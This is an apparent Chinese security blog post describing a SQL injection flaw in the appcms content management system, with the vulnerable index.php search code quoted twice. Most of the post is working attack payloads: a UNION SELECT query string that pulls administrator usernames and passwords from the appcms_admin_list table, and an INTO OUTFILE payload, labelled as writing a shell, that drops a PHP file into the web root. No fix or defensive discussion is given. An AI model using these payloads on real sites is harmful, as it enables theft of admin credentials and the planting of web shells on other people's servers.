appcms 主页注入漏洞

  • A+
所属分类:颓废's Blog
摘要

index.php if (trim($_GET[‘q’]) != ” && !isset($_GET[‘tpl’])) { $str = ”; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE ‘%" . trim($_GET[‘q’]) . "%’ LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list[‘list’]) > 0) { foreach ($app_list[‘list’] as $k => $v){ $app_list[‘list’][$k][‘app_title’] = helper :: utf8_substr($v[‘app_title’], 0, 20); } echo json_encode($app_list[‘list’]); exit; } else { exit; } } $_GET[‘q’]直接带入查询
构造:
q=1%’union select 1,uname,upass from appcms_admin_list %23 1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE ‘%1%’union select 1,uname,upass from appcms_admin_list 写shell:

index.php

if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) { $str = ''; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list['list']) > 0) { foreach ($app_list['list'] as $k => $v){ $app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20); } echo json_encode($app_list['list']); exit; } else { exit; } }

$_GET['q']直接带入查询
构造:

q=1%'union select 1,uname,upass from appcms_admin_list %23

1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list

写shell:

q=1%'union select 1,2,'aaa'  into outfile 'D://WWW//a.php' %23

语句变成:

SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'

作者:p0

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: